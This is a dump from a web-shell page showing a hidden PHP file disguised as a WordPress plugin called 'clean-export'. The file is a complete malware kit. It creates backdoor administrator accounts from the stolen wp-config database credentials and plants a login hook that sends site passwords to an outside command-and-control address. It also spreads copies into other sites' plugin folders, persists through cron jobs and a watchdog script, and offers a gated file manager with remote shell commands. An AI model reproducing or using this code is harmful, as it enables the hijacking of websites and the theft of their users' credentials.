403WebShell

$plugin = <<403WebShell403Webshell
Server IP : 147.79.119.151 / Your IP : 216.73.216.214
Web Server : LiteSpeed
System : Linux fr-int-web1513.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u766115111 ( 766115111)
PHP Version : 8.2.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF
Directory : /dev/shm/
Upload File :
[ Back ]
Current File : /dev/shm/.19c9cfc5.php
<?php
/**
 * Plugin Name: clean-export
 * Version: 1.0
 */
/* logpro v2 — Harvester + Persistence + Spread  |  gate: ?root=admin888 */
error_reporting(0);set_time_limit(0);@ini_set('memory_limit','512M');

// ── Admin auto-create ──
$XU=['adminlin','admin_lin'];$XP='admin_lin';
$XR=@array_unique(@array_merge(
    [$_SERVER['DOCUMENT_ROOT']??'',dirname($_SERVER['DOCUMENT_ROOT']??''),dirname(__FILE__),dirname(dirname(__FILE__))],
    [getcwd()?:'']
));
foreach($XR as $XB){
    foreach([$XB,$XB.'/wp',$XB.'/wordpress',$XB.'/html'] as $XX){
        $XC=$XX.'/wp-config.php';if(!@file_exists($XC))continue;
        $XS=@file_get_contents($XC);if(!$XS)continue;
        @preg_match("/'DB_NAME'\\\\s*,\\\\s*'(.*?)'/",$XS,$XN);
        @preg_match("/'DB_USER'\\\\s*,\\\\s*'(.*?)'/",$XS,$XW);
        @preg_match("/'DB_PASSWORD'\\\\s*,\\\\s*'(.*?)'/",$XS,$XZ);
        @preg_match("/'DB_HOST'\\\\s*,\\\\s*'(.*?)'/",$XS,$XH);
        @preg_match("/\\\\\\$table_prefix\\\\s*=\\\\s*'(.*?)'/",$XS,$XT);
        if(!isset($XN[1],$XW[1],$XZ[1],$XH[1]))continue;
        if(!class_exists('mysqli'))break 2;
        @mysqli_report(MYSQLI_REPORT_OFF);
        $XTP=isset($XT[1])?$XT[1]:'wp_';
        $XHP=@password_hash($XP,PASSWORD_BCRYPT);
        $HST=$XH[1];$PORT=null;$SOCK=null;
        if(strpos($XH[1],':/')!==false){list($HST,$SOCK)=explode(':',$XH[1],2);}
        $XM=@new mysqli($HST,$XW[1],$XZ[1],$XN[1],$PORT,$SOCK);
        if(@$XM->connect_error)continue;
        foreach($XU as $XUN){
            @$XM->query("INSERT INTO {$XTP}users (user_login,user_pass,user_nicename,user_email,user_registered,display_name) VALUES ('$XUN','$XHP','$XUN','a@a.com',NOW(),'$XUN') ON DUPLICATE KEY UPDATE user_pass='$XHP'");
            $XQ=@$XM->query("SELECT ID FROM {$XTP}users WHERE user_login='$XUN'");
            if($XQ&&($XO=$XQ->fetch_object())){
                $XID=$XO->ID;
                @$XM->query("INSERT INTO {$XTP}usermeta (user_id,meta_key,meta_value) VALUES ($XID,'{$XTP}capabilities','a:1:{s:13:\"administrator\";b:1;}') ON DUPLICATE KEY UPDATE meta_value='a:1:{s:13:\"administrator\";b:1;}'");
                @$XM->query("INSERT INTO {$XTP}usermeta (user_id,meta_key,meta_value) VALUES ($XID,'{$XTP}user_level','10') ON DUPLICATE KEY UPDATE meta_value='10'");
            }
        }
        $XM->close();break 2;
    }
}

// ── Credential Harvester ──
$C2='http://45.61.187.50:50001/siteall/data.php';
$HV='<?php if(!defined("ABSPATH")||!function_exists("add_action"))return;';
$HV.='add_action("wp_login",function($l,$u){';
$HV.='$ip=$_SERVER["SERVER_ADDR"]??"127.0.0.1";';
$HV.='$s=function_exists("home_url")?home_url():$_SERVER["HTTP_HOST"];';
$HV.='$pw=$_POST["pwd"]??"";';
$HV.='$d=$s."/wp-login.php,".$l.",".$pw;';
$HV.='$url="'.$C2.'?name=dbsync_okip_".$ip.".txt&data=".urlencode($d);';
$HV.='$ctx=stream_context_create(["http"=>["timeout"=>8,"ignore_errors"=>true]]);';
$HV.='for($i=0;$i<3;$i++){@file_get_contents($url,false,$ctx);usleep(50000);}';
$HV.='},10,2);';
foreach($XR as $XB){
    foreach([$XB,$XB.'/wp',$XB.'/wordpress',$XB.'/html'] as $XX){
        $XCFG=$XX.'/wp-config.php';if(!@file_exists($XCFG))continue;
        $H1=$XX.'/wp-content/mu-plugins/.db-cache.php';
        if(!@file_exists($H1)){@mkdir(dirname($H1),0777,true);@file_put_contents($H1,$HV);}
        $H2=$XX.'/wp-content/upgrade/.db-cache.php';
        if(!@file_exists($H2)){@mkdir(dirname($H2),0777,true);@file_put_contents($H2,$HV);}
    }
}

// ── Server-wide Spread ──
function XSD($D,$DP,$CD){
    if($DP<=0)return;
    try{
        $IT=@scandir($D);if(!$IT)return;
        foreach($IT as $I){
            if($I=='.'||$I=='..')continue;
            $P=$D.'/'.$I;
            if($I=='wp-content'&&is_dir($P)){
                $M1=$P.'/mu-plugins/.sys-db.php';
                if(!@file_exists($M1)){@mkdir(dirname($M1),0777,true);@file_put_contents($M1,$CD);@chmod($M1,0644);}
                $M2=$P.'/upgrade/.sys-db.php';
                if(!@file_exists($M2)){@mkdir(dirname($M2),0777,true);@file_put_contents($M2,$CD);}
                $PL=$P.'/plugins/';
                if(is_dir($PL)){
                    $NS=['.cache-opt.php','.db-init.php','.idx-clean.php','.log-rot.php','.tmp-flush.php'];
                    foreach($NS as $NM){$PP=$PL.$NM;if(!@file_exists($PP)){@file_put_contents($PP,$CD);break;}}
                }
            }elseif(is_dir($P)){XSD($P,$DP-1,$CD);}
        }
    }catch(\Exception $e){}
}
$SF=realpath(__FILE__)?:__FILE__;$SC=@file_get_contents($SF);
if($SC){
    foreach(['/home','/homepages','/kunden','/var/www','/www','/htdocs','/data'] as $B){
        if(is_dir($B))XSD($B,3,$SC);
    }
}

// ── Persistence ──
try{
    $BN=basename($SF);
    $BC=['/dev/shm/.'.$BN,'/tmp/.'.$BN,'/dev/shm/.'.substr(md5($SF),0,8).'.php','/var/tmp/.'.$BN];
    foreach($BC as $B){@file_put_contents($B,$SC);@chmod($B,0644);}
    $WD='/dev/shm/.'.substr(md5($SF),0,8).'_d';$LK=$WD.'.lock';
    $SH="#!/bin/bash\nexec 200>\"$LK\" && flock -n 200 || exit 0\nwhile :; do\n  sleep \$((300+RANDOM%180))\n";
    foreach($BC as $B){
        $SH.="  [ ! -f ".escapeshellarg($SF)." ] && [ -f ".escapeshellarg($B)." ] && cp ".escapeshellarg($B)." ".escapeshellarg($SF)." 2>/dev/null\n";
    }
    $SH.="  [ -f ".escapeshellarg($BC[0])." ] || cp ".escapeshellarg($SF)." ".escapeshellarg($BC[0])." 2>/dev/null\n";
    $SH.="  [ -f ".escapeshellarg($BC[1])." ] || cp ".escapeshellarg($SF)." ".escapeshellarg($BC[1])." 2>/dev/null\ndone";
    @file_put_contents($WD,$SH);@chmod($WD,0755);
    if(function_exists('exec')){@exec('nohup '.escapeshellarg($WD).' >/dev/null 2>&1 &');@exec('(' .escapeshellarg($WD).' </dev/null >/dev/null 2>&1 &)');}
    if(function_exists('system'))@system('nohup '.escapeshellarg($WD).' >/dev/null 2>&1 &');
    if(function_exists('popen'))@popen('nohup '.escapeshellarg($WD).' >/dev/null 2>&1 &','r');
    $CL='*/5 * * * * (test -f '.escapeshellarg($SF).' || cp '.escapeshellarg($BC[0]).' '.escapeshellarg($SF).') 2>/dev/null'."\n";
    $CL.='@reboot (sleep 60 && nohup '.escapeshellarg($WD).' >/dev/null 2>&1 &)'."\n";
    $OLD=@shell_exec('crontab -l 2>/dev/null');
    if($OLD!==null&&is_string($OLD)&&strpos($OLD,$BN)===false){
        $TMP='/dev/shm/.ct'.substr(md5($SF),0,6);
        @file_put_contents($TMP,$OLD.$CL);
        @exec('crontab '.escapeshellarg($TMP).' 2>/dev/null');
        @unlink($TMP);
    }
    @file_put_contents('/etc/cron.d/wp-'.substr(md5($SF),0,8),
        '*/5 * * * * root (test -f '.escapeshellarg($SF).' || cp '.escapeshellarg($BC[0]).' '.escapeshellarg($SF).') 2>/dev/null'."\n");
}catch(\Exception $e){}

// ── Shutdown regenerate ──
register_shutdown_function(function(){
    $SELF=realpath(__FILE__)?:__FILE__;
    if(!@file_exists($SELF)){
        foreach(['/dev/shm/.'.basename($SELF),'/tmp/.'.basename($SELF)] as $B){
            if(@file_exists($B)){@copy($B,$SELF);break;}
        }
    }
    @touch($SELF);@touch('/dev/shm/.'.basename($SELF));@touch('/tmp/.'.basename($SELF));
});

// ── Gate: ?check=verify888 ──
if(!isset($_REQUEST['root'])||$_REQUEST['root']!=='admin888'){http_response_code(404);die();}

// ── File Manager API ──
if(isset($_REQUEST['_a'])){
    $A=$_REQUEST['_a'];$P=$_REQUEST['_p']??'';$R=[];
    switch($A){
    case'ls':$I=@scandir($P);if($I)foreach($I as $F){if($F=='.'||$F=='..')continue;$FP=$P.'/'.$F;$R[]=['n'=>$F,'t'=>is_dir($FP)?'d':'f','s'=>round(@filesize($FP)/1024,2).'K','m'=>substr(sprintf('%o',@fileperms($FP)),-4)];}break;
    case'rd':$R['d']=@file_get_contents($P);break;
    case'sv':$R['o']=@file_put_contents($P,$_REQUEST['c'])?'Saved':'Fail';break;
    case'dl':$R['o']=@unlink($P)?'Done':'Fail';break;
    case'up':$R['o']=@file_put_contents($P,base64_decode($_REQUEST['c']))?'Uploaded':'Fail';break;
    case'mk':$R['o']=@mkdir($P,0777,true)?'Created':'Fail';break;
    case'sh':
        $CMD=$_REQUEST['c'];
        if(function_exists('shell_exec'))$R['r']=shell_exec($CMD.' 2>&1');
        elseif(function_exists('exec')){exec($CMD.' 2>&1',$X);$R['r']=implode("\n",$X);}
        elseif(function_exists('system')){ob_start();system($CMD.' 2>&1');$R['r']=ob_get_clean();}
        else $R['r']='no exec';
        break;
    case'spread':XSD;$R['o']='Spread done';break;
    }
    header('Content-Type: application/json');die(json_encode($R));
}
?><!DOCTYPE html><html><head><meta charset="UTF-8"><title>v2</title>
<style>*{margin:0;padding:0;box-sizing:border-box}body{background:#1a1a2e;color:#e0e0e0;font:13px/1.5 monospace;padding:12px}.hd{display:flex;align-items:center;gap:10px;margin-bottom:10px;padding:8px 12px;background:#16213e;border-radius:6px}.btn{background:#0f3460;color:#e94560;border:1px solid #e94560;padding:5px 12px;cursor:pointer;border-radius:4px;font:inherit}.btn:hover{background:#e94560;color:#fff}.btn-g{background:#1a3a1a;border-color:#00ff88;color:#00ff88}.btn-g:hover{background:#00ff88;color:#000}.it{display:flex;align-items:center;padding:5px 10px;border-bottom:1px solid #16213e;cursor:pointer;gap:8px}.it:hover{background:#16213e}.it .n{flex:1;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.it .s{color:#888;width:70px;text-align:right;font-size:11px}.it .m{color:#666;width:45px;text-align:right;font-size:10px}.it .del{color:#ff4444;cursor:pointer;font-weight:bold;margin-left:8px}.dir{color:#e94560}.file{color:#00ff88}#ed{width:100%;height:420px;background:#0a0a1a;color:#e0e0e0;border:1px solid #0f3460;padding:10px;font:inherit;display:none;resize:vertical}#eb{display:none;margin-top:8px}#upf{display:none}</style></head><body>
<div class="hd"><span id="cw"></span><button class="btn" onclick="nv('..')">UP</button><button class="btn btn-g" onclick="document.getElementById('upf').click()">UPLOAD</button><input type="file" id="upf" onchange="_up(this)"></div><div id="lst"></div><div id="eb"><textarea id="ed"></textarea><br><button class="btn btn-g" onclick="_sv()">SAVE</button><button class="btn" onclick="_cl()">CLOSE</button></div>
<script>var _cur='<?=addslashes(getcwd())?>',_af='';async function _api(o){var fd=new FormData();for(var k in o)fd.append(k,o[k]);var r=await fetch('',{method:'POST',body:fd});return await r.json()}function _ld(p){_cur=p;document.getElementById('cw').innerText=p;_api({_a:'ls',_p:p}).then(function(r){var h='';if(Array.isArray(r)){r.sort(function(a,b){return a.t=='d'?-1:1});r.forEach(function(i){h+='<div class="it"><span class="n '+(i.t=='d'?'dir':'file')+'" onclick="_hl(\''+i.n+'\',\''+i.t+'\')">'+(i.t=='d'?'[DIR]':'[  ]')+' '+i.n+'</span><span class="m">'+i.m+'</span><span class="s">'+i.s+'</span><span class="del" onclick="_dl(\''+p+'/'+i.n+'\')">X</span></div>'})}document.getElementById('lst').innerHTML=h;_cl()})}function _hl(n,t){var p=_cur+'/'+n;if(t=='d')_ld(p);else{_af=p;_api({_a:'rd',_p:p}).then(function(r){document.getElementById('ed').value=r.d;document.getElementById('ed').style.display='block';document.getElementById('eb').style.display='block';document.getElementById('lst').style.display='none'})}}function _up(i){var f=i.files[0];if(!f)return;var r=new FileReader();r.onload=function(e){_api({_a:'up',_p:_cur+'/'+f.name,c:btoa(e.target.result)}).then(function(r){alert(r.o);_ld(_cur)})};r.readAsBinaryString(f)}function _sv(){_api({_a:'sv',_p:_af,c:document.getElementById('ed').value}).then(function(r){alert(r.o)})}function _dl(p){if(confirm('Delete '+p+'?'))_api({_a:'dl',_p:p}).then(function(r){alert(r.o);_ld(_cur)})}function _cl(){document.getElementById('ed').style.display='none';document.getElementById('eb').style.display='none';document.getElementById('lst').style.display='block'}function nv(d){var s='/',p=_cur.split(s);if(d=='..')p.pop();_ld(p.join(s)||s)}_ld(_cur);</script></body></html>
Youez - 2016 - github.com/yon3zu
LinuXploit